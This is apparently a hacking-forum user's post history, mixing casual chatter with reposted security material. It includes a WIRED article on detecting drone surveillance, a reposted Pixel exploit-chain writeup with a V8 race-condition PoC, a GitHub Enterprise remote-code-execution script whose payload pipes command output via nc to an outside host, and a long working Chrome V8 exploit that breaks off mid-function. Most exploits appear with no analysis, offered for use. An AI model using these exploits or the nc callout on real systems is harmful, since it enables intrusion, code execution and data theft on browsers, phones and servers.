Massaro

Everything posted by Massaro

  1. https://www.exploit-db.com/docs/english/43945-jailbreaking-ios-11.1.2-an-adventure-into-the-xnu-kernel.pdf The source is visible.
  2. Massaro

    iPhone 8

    We all complain about iPhone batteries sometimes, but when it comes to performance... I don't think anyone complains. When I see someone complaining about the iPhone, I don't know what they're referring to; I think they haven't held an iPhone for at least a month. Anyway, everybody with their shit. I say get an iPhone 7 if you're OK with it not having a jack. If you need a jack, get a 6s. I say you won't regret it.
  3. As flying, camera-wielding machines get ever cheaper and more ubiquitous, inventors of anti-drone technologies are marketing every possible idea for protection from hovering eyes in the sky: Drone-spotting radar. Drone-snagging shotgun shells. Anti-drone lasers, falcons, even drone-downing drones. Now one group of Israeli researchers has developed a new technique for that drone-control arsenal—one that can not only detect that a drone is nearby, but determine with surprising precision if it's spying on you, your home, or your high-security facility.

    Researchers at Ben Gurion University in Beer Sheva, Israel have built a proof-of-concept system for counter-surveillance against spy drones that demonstrates a clever, if not exactly simple, way to determine whether a certain person or object is under aerial surveillance. They first generate a recognizable pattern on whatever subject—a window, say—someone might want to guard from potential surveillance. Then they remotely intercept a drone's radio signals to look for that pattern in the streaming video the drone sends back to its operator. If they spot it, they can determine that the drone is looking at their subject. In other words, they can see what the drone sees, pulling out their recognizable pattern from the radio signal, even without breaking the drone's encrypted video. "This is the first method to tell what is being captured in a drone's [first-person-view] channel" despite that encryption, says Ben Nassi, one of the Ben Gurion researchers who wrote a paper on the technique, along with a group that includes legendary cryptographer and co-inventor of the RSA encryption algorithm Adi Shamir. "You can observe without any doubt that someone is watching. If you can control the stimulus and intercept the traffic as well, you can fully understand whether a specific object is being streamed."

    The researchers' technique takes advantage of an efficiency feature streaming video has used for years, known as "delta frames." Instead of encoding video as a series of raw images, it's compressed into a series of changes from the previous image in the video. That means when a streaming video shows a still object, it transmits fewer bytes of data than when it shows one that moves or changes color. That compression feature can reveal key information about the content of the video to someone who's intercepting the streaming data, security researchers have shown in recent research, even when the data is encrypted. Researchers at West Point, Cornell Tech, and Tel Aviv University, for instance, used that feature as part of a technique to figure out what movie someone was watching on Netflix, despite Netflix's use of HTTPS encryption.

    The encrypted video streamed by a drone back to its operator is vulnerable to the same kind of analysis, the Ben Gurion researchers say. In their tests, they used a "smart film" to toggle the opacity of several panes of a house's windows while a DJI Mavic quadcopter watched it from the sky, changing the panes from opaque to transparent and back again in an on-off pattern. Then they showed that with just a parabolic antenna and a laptop, they could intercept the drone's radio signals to its operator and find that same pattern in the drone's encrypted data stream to show that the drone must have been looking at the house. In another test, they put blinking LED lights on a test subject's shirt, and then were able to pull out the binary code for "SOS" from an encrypted video focused on the person, showing that they could even potentially "watermark" a drone's video feed to prove that it spied on a specific person or building. All of that may seem like an elaborate setup to catch a spy drone in the act, when it could far more easily be spotted with a decent pair of binoculars.

    But Nassi argues that the technique works at ranges where it's difficult to spot a drone in the sky at all, not to mention determine precisely where its camera is pointed. They tested their method from a range of about 150 feet, but he says with a more expensive antenna, a range of more than a mile is possible. And while radar or other radio techniques can identify a drone's presence at that range, he says only the Ben Gurion researchers' trick actually knows where it's looking. "To really understand what's being captured, you have to use our method," Nassi says.

    Rigging your house—or body—with blinking LEDs or smart film panels would ask a lot of the average drone-wary civilian, notes Peter Singer, an author and fellow at the New America Foundation who focuses on military and security technology. But Singer suggests the technique could benefit high-security facilities trying to hide themselves from flying snoops. "It might have less implications for personal privacy than for corporate or government security," Singer says.

    DJI didn't respond to WIRED's request for comment. Nor did Parrot, whose drones Nassi says would also be susceptible to their technique.

    If the Ben Gurion researchers' technique were widely adopted, determined drone spies would no doubt find ways to circumvent the trick. The researchers note themselves that drone-piloting spies could potentially defeat their technique by, for instance, using two cameras: one for navigation with first-person streaming, and one for surveillance that stores its video locally. But Nassi argues that countermeasure, or others that "pad" video stream data to better disguise it, would come at a cost of real-time visibility or resolution for the drone operator.

    The spy-versus-spy game of aerial drone surveillance is no doubt just getting started. But for the moment, at least, the Israeli researchers' work could give spying targets an unexpected new way to watch the watchers—through their own airborne eyes - WIRED.
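    The detection step the article describes, as an added example (this is not code from the article, from WIRED or from the Ben Gurion paper): delta-frame compression makes an encrypted video stream carry more bytes in the frames where the scene changed, so a stimulus toggled in a known schedule leaves size spikes in the intercepted frames, and the defender only has to correlate per-frame ciphertext sizes with that schedule. The frames-per-symbol value, the correlation threshold, the SOS bit pattern and all frame sizes below are constructed assumptions, not measurements.

```javascript
// Added example, not from the original article: correlate the sizes of
// intercepted (still encrypted) video frames with a known on/off stimulus
// schedule. All constants and sample data here are constructed.

const FRAMES_PER_SYMBOL = 4;  // assumed: the stimulus holds each bit for 4 frames
const DETECT_THRESHOLD = 0.7; // assumed correlation cutoff for "pattern present"

// "SOS" in Morse as stimulus bits (dot = one period on, dash = three, gaps off).
const SOS_BITS = [1,0,1,0,1, 0,0, 1,1,1,0,1,1,1,0,1,1,1, 0,0, 1,0,1,0,1];

// A toggle (opaque<->transparent, LED on<->off) happens where a bit differs
// from the previous one; that is where delta frames get large.
function toggleSchedule(bits) {
  return bits.map((b, k) => (k === 0 ? 0 : (b !== bits[k - 1] ? 1 : 0)));
}

// Mean frame size for each stimulus period.
function periodMeans(frameSizes, framesPerSymbol) {
  const means = [];
  for (let i = 0; i + framesPerSymbol <= frameSizes.length; i += framesPerSymbol) {
    let sum = 0;
    for (let j = 0; j < framesPerSymbol; j++) sum += frameSizes[i + j];
    means.push(sum / framesPerSymbol);
  }
  return means;
}

// Pearson correlation; returns 0 when either series has no variance.
function pearson(a, b) {
  const n = Math.min(a.length, b.length);
  let ma = 0, mb = 0;
  for (let i = 0; i < n; i++) { ma += a[i]; mb += b[i]; }
  ma /= n; mb /= n;
  let cov = 0, va = 0, vb = 0;
  for (let i = 0; i < n; i++) {
    cov += (a[i] - ma) * (b[i] - mb);
    va += (a[i] - ma) ** 2;
    vb += (b[i] - mb) ** 2;
  }
  if (va === 0 || vb === 0) return 0;
  return cov / Math.sqrt(va * vb);
}

// Does the size profile of this stream follow our toggle schedule?
function detectWatermark(frameSizes, bits, framesPerSymbol = FRAMES_PER_SYMBOL) {
  const score = pearson(periodMeans(frameSizes, framesPerSymbol), toggleSchedule(bits));
  return { score, detected: score >= DETECT_THRESHOLD };
}

// Constructed sample stream (no real capture): baseline frames with a little
// deterministic jitter, plus a spike in the first frame after each toggle.
function syntheticStream(bits, spikeBytes, framesPerSymbol = FRAMES_PER_SYMBOL) {
  const sched = toggleSchedule(bits);
  const sizes = [];
  let seed = 12345;
  for (let k = 0; k < bits.length; k++) {
    for (let j = 0; j < framesPerSymbol; j++) {
      seed = (seed * 48271) % 2147483647;        // MINSTD LCG, exact in doubles
      const jitter = (seed % 101) - 50;          // -50..+50 bytes
      const spike = sched[k] && j === 0 ? spikeBytes * framesPerSymbol : 0;
      sizes.push(1200 + jitter + spike);
    }
  }
  return sizes;
}
```

    The detector never needs the plaintext: only frame lengths and timing, which encryption does not hide. That is also why the countermeasure the article mentions, padding the stream, works against it.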
  4. In June 2017, the Android security team increased the top payouts for the Android Security Rewards (ASR) program and worked with researchers to streamline the exploit submission process. In August 2017, Guang Gong (@oldfresher) of Alpha Team, Qihoo 360 Technology Co. Ltd. submitted the first working remote exploit chain since the ASR program's expansion. For his detailed report, Gong was awarded $105,000, which is the highest reward in the history of the ASR program and $7500 by Chrome Rewards program for a total of $112,500. The complete set of issues was resolved as part of the December 2017 monthly security update. Devices with the security patch level of 2017-12-05 or later are protected from these issues. All Pixel devices or partner devices using A/B (seamless) system updates will automatically install these updates; users must restart their devices to complete the installation. The Android Security team would like to thank Guang Gong and the researcher community for their contributions to Android security. If you'd like to participate in Android Security Rewards program, check out our Program rules. For tips on how to submit reports, see Bug Hunter University.

    The following article is a guest blog post authored by Guang Gong of Alpha team, Qihoo 360 Technology Ltd.

    Technical details of a Pixel remote exploit chain

    The Pixel phone is protected by many layers of security. It was the only device that was not pwned in the 2017 Mobile Pwn2Own competition. But in August 2017, my team discovered a remote exploit chain—the first of its kind since the ASR program expansion. Thanks to the Android security team for their responsiveness and help during the submission process. This blog post covers the technical details of the exploit chain.

    The exploit chain includes two bugs, CVE-2017-5116 and CVE-2017-14904. CVE-2017-5116 is a V8 engine bug that is used to get remote code execution in sandboxed Chrome render process. CVE-2017-14904 is a bug in Android's libgralloc module that is used to escape from Chrome's sandbox. Together, this exploit chain can be used to inject arbitrary code into system_server by accessing a malicious URL in Chrome. To reproduce the exploit, an example vulnerable environment is Chrome 60.3112.107 + Android 7.1.2 (Security patch level 2017-8-05) (google/sailfish/sailfish:7.1.2/NJH47F/4146041:user/release-keys).

    The RCE bug (CVE-2017-5116)

    New features usually bring new bugs. V8 6.0 introduces support for SharedArrayBuffer, a low-level mechanism to share memory between JavaScript workers and synchronize control flow across workers. SharedArrayBuffers give JavaScript access to shared memory, atomics, and futexes. WebAssembly is a new type of code that can be run in modern web browsers—it is a low-level assembly-like language with a compact binary format that runs with near-native performance and provides languages, such as C/C++, with a compilation target so that they can run on the web. By combining the three features, SharedArrayBuffer, WebAssembly, and web worker in Chrome, an OOB access can be triggered through a race condition. Simply speaking, WebAssembly code can be put into a SharedArrayBuffer and then transferred to a web worker. When the main thread parses the WebAssembly code, the worker thread can modify the code at the same time, which causes an OOB access.

    The buggy code is in the function GetFirstArgumentAsBytes where the argument args may be an ArrayBuffer or TypedArray object. After SharedArrayBuffer is imported to JavaScript, a TypedArray may be backed by a SharedArraybuffer, so the content of the TypedArray may be modified by other worker threads at any time.

    i::wasm::ModuleWireBytes GetFirstArgumentAsBytes(
        const v8::FunctionCallbackInfo<v8::Value>& args, ErrorThrower* thrower) {
      ......
      } else if (source->IsTypedArray()) {  //--->source should be checked if it's backed by a SharedArrayBuffer
        // A TypedArray was passed.
        Local<TypedArray> array = Local<TypedArray>::Cast(source);
        Local<ArrayBuffer> buffer = array->Buffer();
        ArrayBuffer::Contents contents = buffer->GetContents();
        start = reinterpret_cast<const byte*>(contents.Data()) + array->ByteOffset();
        length = array->ByteLength();
      }
      ......
      return i::wasm::ModuleWireBytes(start, start + length);
    }

    A simple PoC is as follows:

    <html>
    <h1>poc</h1>
    <script id="worker1">
    worker:{
      self.onmessage = function(arg) {
        console.log("worker started");
        var ta = new Uint8Array(arg.data);
        var i =0;
        while(1){
          if(i==0){
            i=1;
            ta[51]=0;   //--->4)modify the webassembly code at the same time
          }else{
            i=0;
            ta[51]=128;
          }
        }
      }
    }
    </script>
    <script>
    function getSharedTypedArray(){
      var wasmarr = [
        0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00,
        0x01, 0x05, 0x01, 0x60, 0x00, 0x01, 0x7f,
        0x03, 0x03, 0x02, 0x00, 0x00,
        0x07, 0x12, 0x01, 0x0e, 0x67, 0x65, 0x74, 0x41, 0x6e, 0x73, 0x77, 0x65, 0x72,
        0x50, 0x6c, 0x75, 0x73, 0x31, 0x00, 0x01,
        0x0a, 0x0e, 0x02, 0x04, 0x00, 0x41, 0x2a, 0x0b,
        0x07, 0x00, 0x10, 0x00, 0x41, 0x01, 0x6a, 0x0b];
      var sb = new SharedArrayBuffer(wasmarr.length);  //---> 1)put WebAssembly code in a SharedArrayBuffer
      var sta = new Uint8Array(sb);
      for(var i=0;i<sta.length;i++)
        sta[i]=wasmarr[i];
      return sta;
    }
    var blob = new Blob([ document.querySelector('#worker1').textContent ], { type: "text/javascript" })
    var worker = new Worker(window.URL.createObjectURL(blob));  //---> 2)create a web worker
    var sta = getSharedTypedArray();
    worker.postMessage(sta.buffer);  //--->3)pass the WebAssembly code to the web worker
    setTimeout(function(){
      while(1){
        try{
          sta[51]=0;
          var myModule = new WebAssembly.Module(sta);  //--->4)parse the WebAssembly code
          var myInstance = new WebAssembly.Instance(myModule);
          //myInstance.exports.getAnswerPlus1();
        }catch(e){
        }
      }
    },1000);
    //worker.terminate();
    </script>
    </html>

    The rest is here. Same source.
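    The race above exists because the parser reads bytes that another thread can still write while the parse is in progress. The following is an added example, not code from the original post, from Google's blog or from V8, showing the defensive pattern in JavaScript: copy a TypedArray into a private, non-shared ArrayBuffer before handing it to WebAssembly.Module, so the compiler only ever sees an immutable snapshot and the result is deterministic (a valid module, or a CompileError, never a torn read). The wasm bytes are the 56 bytes from the PoC; the function names and the byte-51 corruption check are assumptions of this example.

```javascript
// Added example (not from the original post): snapshot a possibly
// shared-backed TypedArray before parsing it as WebAssembly.
// The module bytes are the ones used in the PoC above.
const WASM_BYTES = [
  0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00,               // magic + version
  0x01, 0x05, 0x01, 0x60, 0x00, 0x01, 0x7f,                     // type section: () -> i32
  0x03, 0x03, 0x02, 0x00, 0x00,                                 // function section: two funcs of type 0
  0x07, 0x12, 0x01, 0x0e, 0x67, 0x65, 0x74, 0x41, 0x6e, 0x73,   // export section:
  0x77, 0x65, 0x72, 0x50, 0x6c, 0x75, 0x73, 0x31, 0x00, 0x01,   //   "getAnswerPlus1" -> func 1
  0x0a, 0x0e, 0x02, 0x04, 0x00, 0x41, 0x2a, 0x0b,               // code: func 0 = i32.const 42
  0x07, 0x00, 0x10, 0x00, 0x41, 0x01, 0x6a, 0x0b,               //       func 1 = call 0; i32.const 1; i32.add
];
// Byte 51 is the callee index of that "call"; the PoC's worker flips it 0 <-> 128.
const RACED_BYTE_INDEX = 51;

// Put the module into shared memory, as the PoC does.
function makeSharedView(bytes) {
  const sab = new SharedArrayBuffer(bytes.length);
  const view = new Uint8Array(sab);
  view.set(bytes);
  return view;
}

// The check the vulnerable GetFirstArgumentAsBytes lacked: is this view
// backed by memory another thread can write?
function isSharedBacked(view) {
  return typeof SharedArrayBuffer !== 'undefined' && view.buffer instanceof SharedArrayBuffer;
}

// Copy shared-backed input into a fresh, private ArrayBuffer. After this,
// no other thread holds a reference to the bytes the parser will read.
function snapshotForCompile(view) {
  if (!isSharedBacked(view)) return view;
  const copy = new Uint8Array(view.byteLength);
  copy.set(view);
  return copy;
}

// Compile from the snapshot. Whatever the worker does to `view` afterwards,
// the outcome for this call is fixed at the moment of the copy.
function compileSnapshot(view) {
  const bytes = snapshotForCompile(view);
  try {
    return { ok: true, module: new WebAssembly.Module(bytes) };
  } catch (e) {
    return { ok: false, error: e };  // e.g. WebAssembly.CompileError for corrupted bytes
  }
}

function runGetAnswerPlus1(view) {
  const res = compileSnapshot(view);
  if (!res.ok) throw res.error;
  return new WebAssembly.Instance(res.module).exports.getAnswerPlus1();  // 42 + 1
}
```

    The cost is one memcpy of the module bytes, which is what makes "copy, then parse" the usual fix for any parser that accepts shared memory as input: validation performed on bytes a second writer can still change is not validation of what is later used.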
  5. Read here. The article is quite long. The source is visible.
  6. Massaro

    salut

    Hi. Fuck me, I was holding the mouse button down to see if there wasn't some hidden text, same colour on same colour.
  7. Massaro

    Fun stuff

    They've gotta show somehow that they're complaining about salaries =)).
  8. Did you lose your virginity to this track, that you're sharing it with us?
  9. A PDF for "Level 7" (Ultimatum - ultimele zile ale unui razboi atomic) by Mordecai Roshwald? I can't find it anywhere, I wanted to buy it but wherever I found it they no longer have it in stock.
  10. "The number, the number, the number". You reminded me of "And... the solution? What is the solution? The solution, gentlemen?" Mihaitza boss. Scram :)))))))))
  11. If you have a bit more free time, take a look at this. It's too long to copy-paste here. Good read.
  12. #!/usr/bin/python
    from urllib import quote

    '''
    set up the marshal payload from IRB
    code = "`id | nc orange.tw 12345`"
    p "\x04\x08" + "o"+":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy"+"\x07" + ":\x0E@instance" + "o"+":\x08ERB"+"\x07" + ":\x09@src" + Marshal.dump(code)[2..-1] + ":\x0c@lineno"+ "i\x00" + ":\x0C@method"+":\x0Bresult"
    '''

    marshal_code = '\x04\x08o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\x07:\x0e@instanceo:\x08ERB\x07:\t@srcI"\x1e`id | nc orange.tw 12345`\x06:\x06ET:\x0c@linenoi\x00:\x0c@method:\x0bresult'

    payload = [
        '',
        'set githubproductionsearch/queries/code_query:857be82362ba02525cef496458ffb09cf30f6256:v3:count 0 60 %d' % len(marshal_code),
        marshal_code,
        '',
        ''
    ]
    payload = map(quote, payload)

    url = 'http://0:8000/composer/send_email?to=orange@chroot.org&url=http://127.0.0.1:11211/'

    print "\nGitHub Enterprise < 2.8.7 Remote Code Execution by orange@chroot.org"
    print '-'*10 + '\n'
    print url + '%0D%0A'.join(payload)
    print '''
    Inserting WebHooks from:
        https://ghe-server/:user/:repo/settings/hooks
    Triggering RCE from:
        https://ghe-server/search?q=ggggg&type=Repositories
    '''

    Source: https://www.exploit-db.com/exploits/42392/.
  13. I have a buddy at the University of Birmingham, he really likes it and recommends it. The hardest time he had was with money at the beginning, I can't tell you more. To hell with the options. I was about to post "Am I the only one waiting for aelius to pick on his grammar?" and here you are already.
  14. <html>
    // Source: https://github.com/secmob/pwnfest2016/
    <script>
    function exploit(){
      function to_hex(num){
        return (num>>>0).toString(16);
      }
      function intarray_to_double(int_arr){
        var uBuf = new Uint32Array(2);
        var dBuf = new Float64Array(uBuf.buffer);
        uBuf[0]=int_arr[0];
        uBuf[1]=int_arr[1];
        return dBuf[0];
      }
      function str_to_double(str){//leng of str must be 8
        var dBuf = new Float64Array(1);
        var u8Buf = new Uint8Array(dBuf.buffer);
        for(var i=0;i<str.length;i++){
          u8Buf[i] = str.charCodeAt(i);
        }
        return dBuf[0];
      }
      function double_to_array(value){
        var uBuf = new Uint32Array(2);
        var dBuf = new Float64Array(uBuf.buffer);
        dBuf[0]=value;
        return uBuf;
      }
      function gc(){
        for(var i=0;i<0x100000/16;i++){
          new String;
        }
      }
      function getHiddenValue(){
        var obj = {};
        var oob = "/re/";
        //oob = oob.replace("re","*".repeat(0x2000));
        oob = oob.replace("re","*".repeat(0x100000));
        var str = 'class x extends Array{'+oob+"}";
        var fun = eval(str);
        Object.assign(obj,fun);
        return obj;
      }
      var obWin;
      function makeOobString(){
        var hiddenValue = getHiddenValue();
        var magicStr = "bbbb";
        var arr=[];
        var str = 'class x extends Array{}';
        for(var i=0;i<str.length;i++){
          arr[i]=str.charCodeAt(i);
        }
        var ob = new Array(0x200);
        ob.fill(0x31313131);
        gc();
        gc();
        str=String.fromCharCode.apply(null,arr);
        ob=ob.concat(0x32323232);
        var fun = eval(str);
        ob[2]=str;
        ob[3]=ob;
        Object.assign(fun,hiddenValue);
        var oobString = fun.toString();
        gc();
        gc();
        print("begin search");
        var subStr = oobString.substr(0,0x8000);
        var pos = subStr.indexOf(magicStr);
        print("end search");
        if(pos==-1){
          print("find magic failed");
          postMessage(false);
          self.close();
          print("unpossible");
          throw "error";
        }else{
          print("find magic at "+pos);
        }
        oobString = oobString.substr(pos,ob.length*4);
        obWin=ob;
        return oobString;
      }
      var oobString = makeOobString();
      print("get oob string successfully");
      function print(){
        console.log.apply(null,arguments);
        /*document.write('<p >');
        document.write.apply(document,arguments);
        document.write("<p>");*/
      }
      function str2arr(str,len){//len must be multile of 4
        if(len===undefined)
          len = str.length;
        var u8a = new Uint8Array(len);
        for(var i=0;i<len;i++){
          u8a[i] = str.charCodeAt(i);
        }
        return new Uint32Array(u8a.buffer);
      }
      function pArrayInHex(arr){
        var result="<p style='font-size:8px'>";
        for(var i=0;i<arr.length;i++){
          result+=(arr[i]+0x100000000).toString(16).substr(-8);
          result+=" ";
          if(i%8==7)
            result+="<p style='font-size:8px'>";
        }
        result+="<p>";
        print(result);
        //alert(result);
        return result;
      }
      function pStrInHex(str){
        //var result="<p style='font-size:8px'>";
        var result="\n";
        for(var i=0;i<str.length;i++){
          var code = str.charCodeAt(i);
          result+=(code+0x100).toString(16).substr(-2);
          if(i%4==3)
            result+=" ";
          if(i%32==31)
            // result+="<p style='font-size:8px'>";
            result+="\n";
        }
        // result+="<p>";
        result+="\n";
        print(result);
        return result;
      }
      function getObjAddr(obj){
        obWin[0]=obj;
        var value2= ((str2arr(oobString,4))[0]);
        return value2>>>0;
      }
      var getObj24BitsAddr = function(){
        var smi=0;
        var code = 0;
        var i=0;
        //don't allocate heap object
        function getAddr(obj){
          obWin[0]=obj;
          value=0;
          code = 0;
          i=0;
          for(i=2;i>=0;i--){
            code = oobString.charCodeAt(i);
            value = code+value*256;
          }
          return value;
        }
        return getAddr;
      }();
      var lengthInOldSpace = 0xfffffffc;
      var abarr=new Array(800);
      function sprayVM(){
        var i=0;
        var j=0;
        try{
          for(i=0;i<20;i++){
            var u8 = new Uint8Array(0x10000000-0x500);
            abarr[i]=u8;
          }
        }catch(e){}
        try{
          for(j=0;j<100;j++){
            var u8 = new Uint8Array(0x8000000-0x500);
            abarr[i+j]=u8;
          }
        }catch(e){}
        print("allocate "+i+" 256M "+j+" 16M ")
        function getRandomInt(min, max) {
          min = Math.ceil(min);
          max = Math.floor(max);
          return Math.floor(Math.random() * (max - min)) + min;
        }
        delete abarr[getRandomInt(0,i)];
      }
      function getNewSpaceAddrs(){
        /*var kMaxRegularHeapObjectSize =523776;// 507136;
        var str="1".repeat(kMaxRegularHeapObjectSize-0x2000);
        str+="%";*/
        var objsInNewSpace = new Array(80);
        for(var i=0;i<objsInNewSpace.length;i++){
          //var xx=escape(str);
          var xx = new Array(0x70000/4);
          objsInNewSpace[i]=(getObjAddr(xx)&0xfff00000)>>>0;
          // spread the new space allocations out more
          new Uint8Array(0x100000-0x500);
          new Uint8Array(0x100000-0x500);
        }
        function compareNumbers(a, b) {
          return a - b;
        }
        objsInNewSpace = Array.from(new Set(objsInNewSpace));
        objsInNewSpace = objsInNewSpace.sort(compareNumbers);
        return objsInNewSpace;
      }
      print("begin get new space address");
      var objsInNewSpace = getNewSpaceAddrs();
      while(objsInNewSpace.length<16){
        objsInNewSpace = getNewSpaceAddrs();
        print("new space addresses");
        pArrayInHex(objsInNewSpace);
      }
      try{
        sprayVM();
      }catch(e){}
      var selectedTrunk = 0;
      var selectedStr = "";
      function bruteForceFengShui(){
        var huge_str = "x".repeat(0x100000-0x9000);//-0x9000
        huge_str +="%";
        var hold = new Array(100);
        //var holdaddress = new Array(100);
        for(var i=0;;i++){
          var large = escape(huge_str);
          var addr = getObjAddr(large);
          //console.log(addr.toString(16) + " "+i);
          if(i<hold.length){
            hold[i]=large;
            //holdaddress[i]=addr;
          }
          addr=(addr&0xfff00000)>>>0;
          addr = addr-0x100000;
          if(objsInNewSpace.indexOf(addr)!=-1){
            selectedTrunk = addr;
            selectedStr = large;
            abarr.fill(1);
            hold.fill(1);
            //holdaddress.fill(1);
            break;
          }
          if(i===150){
            /*i=0;
            print("tried 200 times");
            abarr.fill(1);
            try{
              sprayVM();
            }catch(e){};*/
            postMessage(false);
            close();
            throw "exceed limits";
          }
        }
      }
      bruteForceFengShui();
      //to avoid allocate memory latter, initilize here
      var nextTrunk = selectedTrunk + 0x100000;
      // build a readable/writable memory region that is large enough
      var huge_str = "eval('');";
      // 8000 must not be too large; too large would make new_space grow
      for(var i=0;i<8000;i++)
        huge_str += 'a.a;';
      huge_str += "return 10;";
      var huge_func = new Function('a',huge_str);
      huge_func({});
      function fillNewSpace(origObj){
        //first object in new space at 0x8100, new spaces layout
        //0x40000
        //0x37f00
        //.....
        //0x40000
        var gap = "g".repeat(0x37f00-12-3);//12 is head of string,3 %25
        var gap = gap+"%";
        //flat gap
        gap.substr(0,100);
        var fillstr = "%20a".repeat((0x40000-12)/4);
        fillstr = escape(fillstr);
        var addr=0;
        for(var i=0;i<0x100;i++){
          addr = getObj24BitsAddr(origObj);
          if((addr&0xfffff)===0x8101)
            origObj=escape(gap);
          else
            origObj=unescape(fillstr);
        }
      }
      function findNewSpace(){
        var kMaxRegularHeapObjectSize =523776;// 507136;
        var str="1".repeat(kMaxRegularHeapObjectSize-0x2000);
        str+="%";
        for(var i=0;;i++){
          var xx=escape(str);
          var straddr = getObjAddr(xx);
          addr=(straddr&0xfff00000)>>>0;
          if(addr===selectedTrunk){
            print("good state "+straddr.toString(16));
            break;
          }
        }
      }
      function myencode(str){
        var arr = [];
        for(var i=0;i<str.length;i++){
          if(i%2==1)
            arr.push(str.charCodeAt(i));
          else{
            arr.push(37);//%
            var hexstr = (str.charCodeAt(i)+0x100).toString(16).substr(-2);
            arr.push(hexstr.charCodeAt(0));
            arr.push(hexstr.charCodeAt(1));
          }
        }
        return String.fromCharCode.apply(null,arr);
      }
      var dArray = [];
      var index = (0x8100-36)*2;
      for(var i=0;i<0x20000/8;i++){
        dArray[i]=str_to_double("%03x%03x");
      }
      var occulen = 0;
      var i = 0;
      var savedChunk = new Uint8Array(0x8100);
      var hiddenValue = getHiddenValue();
      var arr=[];
      fillNewSpace(new String);
      findNewSpace();
      var classStr = 'class x extends Array{}';
      for(var i=0;i<classStr.length;i++){
        arr[i]=classStr.charCodeAt(i);
      }
      var magicStr = String.fromCharCode(0x86,0x24);
      classStr=String.fromCharCode.apply(null,arr);
      var ab = new ArrayBuffer(0x1243);
      var fun = eval(classStr);
      Object.assign(fun,hiddenValue);
      var oobStr = fun.toString();
      /*(gdb) x/20xw 0x5600c45c   array buffer layout
       * 0x5600c45c: 0x4b009a9d 0x41008125 0x41008125 0x00000020
       * 0x5600c46c: 0x09fda368 0x00000004 0x00000000 0x00000000
       */
      //overwrite huge string as array buffer
      var abLengthIndex = oobStr.indexOf(magicStr);
      var strArrayBuffer = oobStr.substr(abLengthIndex-12,32);
      //replace the byteLength
      var LengthAddr = getObjAddr(lengthInOldSpace);
      var strLength = String.fromCharCode(0xff&LengthAddr,(0xff00&LengthAddr)>>8,(0xff0000&LengthAddr)>>16,(0xff000000&LengthAddr)>>24);
      var strBase = "\x00\x00\x00\x00";
      strArrayBuffer = strArrayBuffer.substr(0,12)+strLength+strBase+strArrayBuffer.substr(20,12);
      strArrayBuffer = myencode(strArrayBuffer);
      for(var i=0;i<strArrayBuffer.length/8;i++){
        var d = strArrayBuffer.substr(i*8,8);
        dArray[index/8+i] = str_to_double(d);
      }
      var classStrAddr = getObjAddr(classStr)>>>0;
      //set read position
      var readOffset = 0x100000-((classStrAddr-1)&0xfffff)-12-0x40000;//12 string head
      //length control the length of unscaped string, generated string has 12 bytes head
      //left 0x1000*2 bytes to avoid gc
      var subOobStr = oobStr.substr(readOffset,0x40000-24-0x2000);
      //save the the chunk head to be corrupted
      var nextThunkOffset = 0x100000-((classStrAddr-1)&0xfffff)-12;
      var savedThunkStr = oobStr.substr(nextThunkOffset,0x8100);
      for(var i =0;i<savedThunkStr.length;i++){
        savedChunk[i] = savedThunkStr.charCodeAt(i);
      }
      var pos1=new String;
      var pos1addr = getObj24BitsAddr(pos1)-1;
      //0x10 size of JSArray, 0x10 size of String head, 8 ALLOCATION_MEMENTO_TYPE 8 fixedarray
      occulen =0x100000-((pos1addr+0x10+0x10+0x8+0x8)&0xfffff);
      //minus the length of double array
      if(occulen<0x40000+16+8)
        throw "no enough room";
      occulen = occulen - 0x40000-16-8;//16 size of JSArray, 8 fixedarray
      if(occulen%4!==0)
        throw "length don't align";
      var arrocc=new Array((occulen/4));
      //set unescape write position
      var occDoubleArray = dArray.concat();
      var b=unescape(subOobStr);
      //restore the corrupted chunk head
      var u8 = new Uint8Array(selectedStr,nextTrunk,0x8100);
      for(var i=0;i<savedChunk.length;i++){
        u8[i] = savedChunk[i];
      }
      print("long string allocated at "+classStrAddr.toString(16));
      if(typeof(selectedStr)==="string"){
        print("overwrite failed");
        postMessage(false);
        close();
        return;
        //throw "overwrite failed";
      }
      var fakeab = selectedStr;
      print("faked array buffer byte length is "+fakeab.byteLength.toString(16));
      var globaldv = new Uint32Array(fakeab);
      function read_uint32(from_address){
        var u32 = globaldv[(from_address/4)>>>0];
        return u32>>>0;
      }
      function read_uint8(from_address){
        from_address = from_address>>>0;
        var index = (from_address/4)>>>0;
        var mask = from_address%4;
        var u32 = globaldv[index];
        u32 = u32<<8*(3-mask);
        return u32>>>24;
      }
      function read_uint32_unalign(from_address){
        var u32 = 0;
        for(var i=3;i>=0;i--){
          var u8 = read_uint8(from_address+i);
          u32 = u32*0x100+u8;
        }
        return u32>>>0;
      }
      //rw to execute
      //get function point of v8::internal::Accessors::ReconfigureToDataProperty
      function getFixedFunctionPoint(fakeab){
        var FunctionAddress = getObjAddr(Function);
        var u32 = new Uint32Array(fakeab,FunctionAddress-1,0x1000);
        var map = u32[0];
        u32 = new Uint32Array(fakeab,map-1,0x1000);
        //instance descriptors
        var descriptors = u32[7];
        u32 = new Uint32Array(fakeab,descriptors-1,0x1000);
        var lengthAccessorInfo = u32[6];
        u32 = new Uint32Array(fakeab,lengthAccessorInfo-1,0x1000);
        var setterForeign = u32[4];
        u32 = new Uint32Array(fakeab,setterForeign-1,0x1000);
        var functionPoint = u32[1];
        return functionPoint-1;
      }
      var funPoint = getFixedFunctionPoint(fakeab);
      print("ReconfigureToDataProperty at"+funPoint.toString(16));
      var pattern=[0x03,0x46,0x18,0xb1,0x20,0x46,0x98,0x47,0x04,0x46];//get_elf_hwcap_from_getauxval
      var point = ((funPoint&~0xfff)-0xdb6000)>>>0;//cf0000
      print("chrome.apk base at "+point.toString(16));
      function find(startAddr,len,pattern){
        for(var i=0; i<(len-pattern.length); i++ ) {
          for(var j=0;j<pattern.length;j++){
            var temp = read_uint8(startAddr+i+j);
            //print(temp.toString(16));
            if(temp!=pattern[j])
              break;
          }
          if(j==pattern.length)
            return startAddr+i;
        }
        print("find failed");
      }
      var pattern_position=find(point,0x10000000,pattern);
      print("find pattern at "+to_hex(pattern_position));
      function get_dest_from_blx(addr) {
        var val = read_uint32_unalign(addr);
        var s = (val & 0x400) >> 10;
        var i1 = 1 - (((val & 0x20000000) >> 29) ^ s);
        var i2 = 1 - (((val & 0x8000000) >> 27) ^ s);
        var i10h = val & 0x3ff;
